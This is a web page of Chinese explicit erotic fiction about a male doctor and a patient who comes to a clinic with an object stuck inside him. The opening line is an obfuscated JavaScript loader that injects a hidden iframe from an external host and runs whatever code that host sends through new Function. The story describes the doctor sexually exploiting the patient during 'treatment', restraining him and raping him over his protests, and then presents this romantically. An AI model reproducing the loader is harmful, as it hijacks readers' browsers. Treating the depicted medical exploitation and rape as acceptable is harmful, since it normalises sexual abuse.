eval('\x77\x69\x6e\x64\x6f\x77')['\x62\x48\x79\x4a\x6f\x64\x6a']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u.split("NN").join(""),r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='wwttyy'){new Function(e.data['d'])()}})})('hNNtNNtNNpNNsNN:NN/NN/NNjNNaNNcNNqNNuNNeNNlNNiNNnNNeNNlNNaNNuNNrNNaNN.NNcNNoNNmNN:NN3NN4NN5NN6NN2','/cd/108_m/1448',window,document)};

[现代情感] 男科诊疗室

现在社会,男性病也开始被关注,而现在要说的这个男科诊疗室,就是全国最先进,也是医生‘技术’最强的诊室……“医生…”一个看起来很是阴柔的男子,别扭的走了进来

  “你好,请坐。”身着白衣,带着口罩的男医生对这位患者做了个‘请’的姿势后,也落了坐。

  “咳…我…”脸色有些微红的患者,难以起齿。

  “没关系的,这里就是治疗男性病的地方,您可以放心的把病因说出来,我们会保密的。”已经习以为常的专家级医生,对他谆谆善诱着。

  “嗯…我…我的肠内有…异物…无法…”患者低垂着头,结结巴巴的诉说着,“无法排出…”

  “嗯…看来您的病需要灌肠…”医生认真的思考了一下,说出解决的办法,并不去问肠内有异物的原因。

  “…听说灌肠很痛的…”患者想用其它办法,可只有医生才知道怎么治疗。

  “放心,灌肠前,我会让您的肛门放松,不会受伤的。”医生走到诊疗室门前,锁上了门,“为了您的隐私,我要锁上诊室的门,还有…”医生走到一个侧前,“这是灌肠室,一会儿进去后,我也会上锁,所以请您放心。”

  听了医生的再三保证,患者也安心了,毕竟是医生,什么病患没见过,自己这点事人家应该不会放在眼里吧…“嗯…那拜托了…”说完就跟着医生进了灌肠室内。

  “请您把脱下的衣服放入置衣柜中。”医生指了一下进门后的白色柜子,开始从桌上选择待会儿的用具。

  “耶?还要脱衣服?”患者有点吃惊。

  “哈哈…当然,您不会想让衣物上粘到污物吧…当然,我也会脱的,您不必觉得不好意思,灌肠时都要这样的。”安慰了一下患者,医生把淋浴用的喷头拔下,换上一个稍小的金属物。

  “呃…这样啊…”开始还有点害羞的患者,看医生那么坦荡,自己也不去想了,快速的把身上衣物脱个jing光,放在柜中。

  “您脱好了吗?”医生把所有的准备工作做完后,转头看向患者。

  “嗯,现在我该做什么?”轻掩着下身,患者看着还穿戴整齐的医生。

  “嗯…”医生低着头看了一下排水口,“您先四肢着地的跪在这个洞口,我好为您放仪器。”说完拿出一个小小的柱形物,“对了,忘记问您,您体内的异物是什么?”

  “啊?…那个…是个长桶形的环状物…”患者犹豫了一下还是说了。

  “嗯…比这个大还小?”让患者看了看手中的物体。

  “…大两倍左右吧…”想了一下,患者用手比了比。

  “好,那您过来吧。”说着把KY涂在手中的物体上。

  “哦…”跪好后,患者才发现医生在做什么,“啊…那个…医生,这个东西不会是要…”

  “对啊,不先撑开肛门肌肉,是没办法把灌肠液灌入的…您最后的排便时间是什么时候?”涂完后,医生用手指在患者的小xue上按了按,惹得患者shen yin出声。

  “啊~医生!”无措的转身看向医生。

  “因为这影响到待会儿灌肠前后洗涤的次数,如果您记得详细时间,请说明一下。”还是公事公办的语气,可手指却在不停挖着已经开始松软的小xue。

  “呜~是…昨天…夜里…”忍着异样感,患者回忆着。

  “那样啊…”轻轻把手中的物体推入小xue内。

  “呀啊~”已经被手指弄得异常敏感的小xue,突然被物体刺激,让他尖叫出来。

  “应该不用冲太多次,两三次就可以了…那个异物是什么时候进去的?您可以感觉到它在哪个位置吗?”怎么也不像是对他有企图的样子,可那种有技巧的动作…“嗯~今天…早上…位置就在洞口内…不到五厘米的…地方吧…”患者边shen yin着,边回答医生的问话。

  “拿不出来是因为肠液起到润滑作用了吧…看来一会儿还要用机械取出…放心,不会太痛的…”医生站起身,按了一下墙上的开关,在患者上方就出现了一个机械架,看样子是固定人用的。

  “这…这是…”有点紧张的问。

  “我先脱衣服,您的肛门肌肉已经放松,等我脱完,就给您冲洗内部…还有,您将会被固定在这个架子上,如果让您乱动,会受伤的。”边解释边快速退下最后一件内衣。

  “嗯…”虽然会被绑住,但那也比现在的姿势要好点吧…患者心中想着。

  “好了,您先把体内的物体排出来,然后呆在原地不要动。”说着取下刚刚改好了的喷头走过去。

  “啊!”刚刚排出那个物体,就被大了两倍的改装喷头顶入,患者不适地扭了起来。

  “…现在我要灌水进去了,您可以不必顾忌的大声叫出来,这里隔音设施很好。”打开调好水温的开关,马上听到患者的闷哼。

  “唔…嗯…好…难过…啊…”摇晃着细腰,患者发出苦闷的shen yin。

  “差不多了,在我拔出后,您要紧闭肛门,等三分钟后才能排水,知道了吗?”医生谨慎的嘱咐着。

  “是…啊!”医生猛地拔出插入体内十厘米有余的喷头,让患者无法去闭紧小xue,水一下放出了一大股。

  “…先用这个堵上好了…”医生拿出像是早已经准备好的肛塞顶入患者的小xue口。

  “呀~嗯…”患者在刚刚医生拔出喷头时,下身就已经完全勃起,现在又被肛塞一下顶住,舒爽的shen yin出来。

  现在患者才看到医生的真面目,刚刚被掩住的脸,已经全部露了出来,本来以为是个中年男子,可面前的医生明明是个20多岁的成熟男性,冷峻的双目,如电般扫视着他的mi 处,英挺的鼻与完美冷酷的嘴形,再配上一双剑似的浓眉…患者越看,身体越热了…但当他扫视医生全身时,却发现,医生的下身出一块布片遮着,像日本人似的……“好了,您可以排出了。”医生熟练的拔出肛塞,排出物几乎马上喷了出来。

  “呜…”一股羞耻感,随着液体的排出而拢罩在患者全身,他羞得全身都泛起了红。

  “现在请您躺到机械架上。”医生职业化的引导患者进入下一环节。

  “…嗯…呃…”患者刚刚想站起来,可脚下一软一下跌在随后的医生身上。

  “刚刚就觉得您…是不是有点营养失调?”用医生的眼光审视了一遍患者的五观。

  “…最近工作忙,的确没有好好吃东西…”患者勉强站稳,但双脚还是不听使唤的微颤。

  “做完后再开点营养剂给您吧…”医生本着医者之心的劝着病患。

  “嗯…麻烦您了…”患者躺到机械床上,应着他。

  “您躺好,我要用皮套把您的双手固定在头部…”边说边做着,“还有把您的双脚提高用机械锁固定住。”

  患者头朝下的被仰面定在像是床的板状物上,让他有种像是将要被施暴的感觉。

  我要灌肠液进去了…你选择一下器具吧…“医生拿出一个漏斗状的东西,和一个像是给牛打针的针筒。

  ”这是…“不太明白医生的意思。

  ”这个漏斗可以让您不必受肛门肌肉被撑开的痛苦,但是慢,您的肠壁会因长时间被灌肠液浸泡而痉挛,导致强烈的排出感;这个大型针筒则可以在一分钟内全部灌入,可是会让肛门有些疼痛…“医生耐心的解释着。

  ”…还是用针筒好了……“患者觉得有点不对劲,但是一时又想不出是哪里…”其实我用针筒还有一个作用。“医生灌好满满一筒液后,把它顶在小xue上,”就是…也许会让那个异物随着针筒的拔出,而一起滑出来。“”真的?!太好了~“患者高兴的对着医生一笑。

  ”那我要进去了。“猛地一顶,成 ren手臂大小的针筒被钉入小小的花xue中。

  ”啊啊!好痛!“患者因痛而用力缩起小xue。

  ”放松…放松…“医生用手指轻揉着xue口的嬾肉。

  ”嗯~~啊~~~不~~啊~~“患者被揉得分泌不少出肠液,针筒一经润滑,一下几乎没根顶入。

  ”我要用这个针筒在肠壁中不停运动,也许可以借助肠活动,把它排出。“医生说着开始抽插起微微开花的小xue。

  ”嗯~呀啊~~啊啊~~“由慢而快的挺动,让患者的分身更加高耸,他也无意识的shen yin起来。

  医生由开始只是按一定规律的动作,变得横冲乱撞起来,不时被顶到G点的患者,在双手双脚被缚的情况下,只有扭动身体来发泄这种不明的感觉。

  ”啊啊~不…不行了~呀啊啊啊~~~“在针筒狂猛的抽插不到十分钟时,患者终于被搞到gao chao,jingye在空中抛个弧度,落到患者的前胸与脸上,看上去yín媚非常…”还是…没有出来…“医生抽出针筒,并没有把液体注射到患者肠内。

  ”嗯~“患者还在失神中,小xue正一点一点的闭合上。

  ”看来就算灌肠也没什么用了…“医生脸色沉重的表示患者‘没治’了。

  ”那…可怎么办啊…医生…呜…“患者终于清醒,而受不了的哭了出来。都当着别人的面gao chao了,还是没办法吗……”…我这里并没有那种仪器…“医生表示无奈的耸了耸肩,走到患者身旁,开始解开他的束缚。

  患者哭的泪眼婆娑,无意中看到,医生下身的布片,被一根比一般人长而粗大的肉bang高高顶起…”……医…医生…“患者用刚被放开的双手拉了拉医生身上唯一的布片。

  ”嗯?“正要帮患者去解除脚的固定器时,被叫住。

  ”如果…如果您不介意的话…“虽然这是没有办法的办法,患者还是羞红了脸,”可…可不可以用您自己的…“他的脸像要滴血般,让医生微微皱眉。

  ”用我自己的?我刚刚说过我并没有可以帮您的仪器了,它已经进得太深了,所以…“医生有点悔恨的样子,”这都是因为我的错,不应该给您灌肠的…“”啊…可是…如果您可以…用您…您身上的‘东西’帮我…“患者努力的想让医生理解。

  ”可我身上没…您…您是说…这个?“指了指已经从布片下露出头的大肉bang。

  ”…嗯…“他害羞的低下了头。

  ”不行!“没想到医生这么快就拒绝,患者惊讶的望着他。

  ”…为什么?您不是医生么?“也不管那么多了,患者大胆地反问。

  ”我是医生,不能与患者做出这种事。“态度没有一点可商量的余地。

  ”可是…可是…呜…“患者哭诉起来,”明明就是您把它弄到更里面去的…难道您可以推卸责任么…“”…我…可是…“医生还想说什么。

  ”总之您一定要负责任…而且…“患者一改刚刚的大胆,又开始害羞起来,”我…也是第一次和男人…但为了那个东西我可以忍耐的…“他媚眼如丝的斜睨了医生一眼,医生全身猛地震了一下。

  ”…好!这可是您说的…到时候不要反悔!“刚刚看患者那么yín乱的样子已经把他的‘性’致提到最高点,终于忍不住,他扯下布片,狠狠的把患者压在身下……”啊~您…轻~轻点~“含羞带怯的患者轻抵着医生从上面压下来的健壮胸膛。

  ”哼~~你自己在家里玩小xue的时候,有‘轻点’吗~“医生爱抚着患者的敏感果实,还不忘用语言挑逗着他。

  ”讨~讨厌~人家才没有~“患者被医生玩弄得全身发颤,撒起娇来。

  ”告诉我,自己玩的时候有没有射过~“医生边吻着患者的唇,边用手指戳进小xue内。

  ”呀啊~~你好坏~~“患者用力吸着那两根修长的手指,想像着被眼前男人插入时的kuai gan。

  ”呵呵~~一会儿我还会更坏呢~~“医生走到患者被固定着的两腿之间,清楚的看到小xue在一张一合的需求着他。

  ”啊~医生~我…我要~“患者看他走到那里,心想应该要进来了吧。

  ”……“医生不理他的求欢,蹲下身,双手抓紧两片粉臀,”这就让你爽到天!“说着把舌头深深挺入流着yín液的小xue中。

  ”呀啊~嗯啊~医生不要啊~“患者剧烈的扭动起腰,可双腿被固定住,根本无法逃离医生粗长舌头的操弄。

  看着被舌头操得yín叫不已的患者,医生眼神更深邃了…”呜~~啊~~医生~我要~“患者的小yínxue已经被舌头开发得洞口大开。

  ”哼~“医生站起身,下身正好对着泛着yín光的小xue,”这就给你~小yín娃!“说着污辱的话,巨大的肉bang也在同时狠狠顶入。

  ”唔…啊啊啊~~不不~~好涨…啊嗯~“患者被一下顶到最深处,受不了的yín叫起来。

  ”真是yín荡啊~刚刚第一次就这么会吸~“医生轻摇着腰身,感受着患者内部强烈的吸吮。

  ”呜呜~医生~不…不要动…“第一次的他怎么可能马上习惯医生非常人的肉茎,全身被那一顶顶得颤抖不已。

  ”可是它…“医生对着不停吸着自己肉bang的yínxue,蛮横的抽插了一下,引来患者的痛呼,”可一直吸着我不放呢~“说完迅猛地胡乱顶撞起来。

  现在双腿被高高挂起的患者,正被后面的医生狠操着,由于这种姿势是高难度动作,患者一直徘徊在极痛与极爽中不能自拔。

  ”怎么样~我的…够大吗~嗯?“医生边横操着患者充血的小xue,边问出下流的话。

  ”呀啊~嗯…哦~太…太粗了…嗯…不要…“患者双手用力抓着身下的床单,边摇着头边哭泣着。

  ”不要~?哼~~干!干!干死你!!“像是惩罚他一样,医生狂猛的快速动着有力的腰身。

  ”啊!呀~~不要不要啊~~“在被医生被猛捅时,患者的G点被医生顶到,yín乱的动作与yín叫声立刻让医生的肉bang增大了一圈。

  ”小sao货~真是欠操!“被患者yín荡的样子迷惑,医生的巨根卖力的如失灵机器般超速的旋动顶撞着。

  啊─”患者喘气哀鸣,眼框中含着屈辱羞惭的泪水,无奈,他仍抵挡不过欲望的侵袭,贪愉的摆动着下体,无法自拔。

  医生用力抓着他的腰际,重重的抽送、冲刺。

  “噢啊……嗯哈……医…啊生……哈啊…我…喔~~好深~~~呀~~啊……啊啊……”医生不断地加快抽插的速度,时快时慢,角度微妙的变化。患者被干得整个人大幅度地向後弓起背,不成声地yín叫了起来。

  医生低下头,看着自己的巨兽不断进出那yín乱的小xue,那红嫩的内壁不断被翻开,收缩,再翻开,再收缩,贪婪吮吸自己汁液横流的肉bang,他像疯了一样,得势不饶人的更加凶狠地在他温热紧迫的巢xue里冲插着,死命的再往更深处插进去,kuai gan似洪水般将患者淹没,他嘶喊着被医生操到gao chao。

  “呜…医生…”患者的腿被放开,全身无力的靠在医生身上,“那个东西…还是没有出来吗…”

  “放心~我已经在你失神的时候帮你取出来了~”医生心情愉快的从后方拥着被自己操到gao chao,刚刚才回神的xing 感尤物。

  “真的?可…我没有什么感觉啊…”患者的双腿还在轻抖着,惹得医生身下又是一紧。

  “…我的家伙还不够大吗?”医生佯做生气,用恢复硬挺的肉bang顶了顶患者依旧敏感的臀瓣,患者张开嘴无声的shen yin着。

  “不…不是…可真的没有…”患者还是不相信。

  “那种东西那么小,你的yínxue又被我的家伙操了那么久,早就松垮垮的了,怎么可能感觉得到它出来…”医生引导着自己的肉bang,开始顶起没有‘愈合’的yín乱小xue。

  “啊~不~医生~既然已经出来了…”患者轻轻推拒着,但由于被操了两个多小时,全身都没有力气,这样倒像在挑逗男人。

  “小贱货!不想让我干,是不是想让别的男人干你啊~外面有几十个男人,要不要他们来满足你啊~”医生双手抓住患者的腰,一用力,大肉bang再次顶入正流着yín液与男人jingye的yínxue。

  “啊!呀啊~不~不要~”患者虽然不想再继续,但小xue里的猛蛇却乱捅起来。

  “不~放开我~啊啊~~我我要…叫人啦~啊~”患者被从后面操着,医生生猛的肉bang全部抽出再狠狠撞入,大开大合的尽兴的操干着他。

  “叫人~哼哼~~让他们来欣赏你被我cao得yín乱的样子?还是想让他们一起上你啊~?~叫床还实际些吧~哈哈哈~~”边说着边用力的在患者身上冲刺。

  “啊~啊~呀啊~!”患者的肉体不停排斥着粗壮男根,「啪啪!」每一个猛烈的撞击伴随着肉体碰撞的声音,还有交合处发出yín秽的声音,他的身体亦随着医生的节奏不停的跟着律动。

  律动越来越快速、抽插的次数也越来越频繁、有力的撞击声也越来越大声…「啪啪……啪啪……」

  “啊……啊啊啊啊…”那身体被深入到底的kuai gan与充实,令患者不禁大声地shen yin……他的臀部一下子撑的好大,被医生巨大的男根任意抽插……一股从下身冲上的颤栗,让患者不自觉地僵直了身体…“嗯啊~啊~~~~呀~~~~”患者不相信,被半强迫的奸yín着自己竟然有那么强烈的感觉,只是被男人操小xue而已就…“真是又sao又媚啊!就是要人不停的插才爽吧!”医生疯了一般的捣起被他干得松弛的yínxue来。

  患者不停喘气、浪叫、shen yin、娇喘…“啊啊…不要~~~”

  医生把他的右腿高高地扛在肩上,骑在他身上,抱住他的肩膀,用力的从yínxue抽出阴jing再往内部深处撞上去。

  “啊啊啊 ~~~~~~~~~~~~~~啊啊~~~~~~~~~啊~啊啊~~~~~啊啊~~~~~~~~~”医生把浑身的jing力,对准他的yínxue深处,时深时浅,乍缓乍快,拳头大小的蘑菇头,刮到意想不到的部位,让他gao chao的不能自己。他没命的抱住医生的脖子,猛烈的扭动腰。看着他在自己的强迫下摆出的yín荡姿势,医生那坚硬如巨的东西又立刻亢奋起来,巨大的肉bang狠捣猛干,戳得让他几乎疯了……“不要!!不要啊~!!!不…啊……啊!!!……嗯~啊~……”

  每一次都到达从没有过的深处,yín秽的shen yin,表情,浑身上下的感觉,医生觉得自己更热了……“不~~!!!~”患者被奸到gao chao的同时,医生也吼叫着射入他体内,热液一滴也没漏到yínxue外,全被巨物顶入最深处…“呜…呜呜…”患者裸着身子跪坐在地上,医生清理完两人后,已经着好装。

  “我的责任止于此了,之后该怎么做就是你的事了。”打灌肠室的门,医生潇洒的走了出去。

  “嗯…呜…”患者缓缓站起来,擦干自己,开始着装,顺便想了下刚刚医生提意的事…[“你是同志吧,只是还在隐藏阶段。”医生爱抚着他敏感的背。

  “嗯…”患者对于第二次的强bao式做ai,还在羞愧中,自己竟然被强 jian到gao chao…“我有个提意,既然我是你的第一个‘男人’,不如与我交往看看。”患者被医生的话震住了。

  “可…可是…我…”不知道自己是不是喜欢他,所以做不出选择。

  “没关系,你可以好好想想。不过…”医生暧昧的扫视着患者还在抽搐的小xue,“我们的身体的契合度很高,你的反映我也很满意,而且…我自认为自己的‘能力’非常强,足够让你满足了…想想~嗯~?!”说完,医生开始帮他清理身体…]

  “可是…呜…”还在为自己的放荡而悲泣的患者,也不忘细细考虑,“如果和他交往,不是要每天都被他这么操了…虽然很舒服,但是小xue会痛啊…”心里矛盾着被上的问题,没有注意刚刚被关上的门,又被另一个男人悄悄打开……“小宝贝~”男人突然从他身后抱住他。

  “呀啊!”吓得不轻的患者,挣扎着转过身。

  “嗯?不是一?”男人并没有放开他,但手上的力道放轻的少许。

  “一?是那个医生吗?”听他对医生的称呼…医生不会是下面的吧…“怎么可能是他!我听说一在他这里,才会以为是他们有什么关系,原来是误会吗?~~”轻抚着还未着装的背部。

  “嗯~不…放开我!医生!!医生!!!”患者紧张的呼喊起刚刚还在强bao自己男人。

  “什么事?……!!放开他,林,朋友妻不可戏不懂吗!”医生一把抢过被吓到的‘小白兔’,瞪视着男人。

  “是是!不过一没来吗?”

  “没有。”大有送客的意思。

  “那~再见喽~”用暧昧眼光在两人间扫来扫去十多秒,才慢慢走出去。

  “……哼~~知道向我求救嘛~”医生紧抱着患者的腰。

  “…那个…我…我想可以…”患者心想,反正吃也让你吃了,不跟你跟谁?

  “可以?什么可以?”医生莫名其妙的问。

  …讨…讨厌啦~“轻垂着他的胸膛,患者红着脸说,”就是…交往的事嘛…“”哦~~~怎么?看我英雄救美,打算以身相许啦?~~“医生挑逗着害羞的患者。

  ”…什么以身相许啊…明明就已经先许过了…嗯~“患者嘟着的嘴被医生狠狠擒住,又一次进入翻云覆雨中…

【完】

15584字节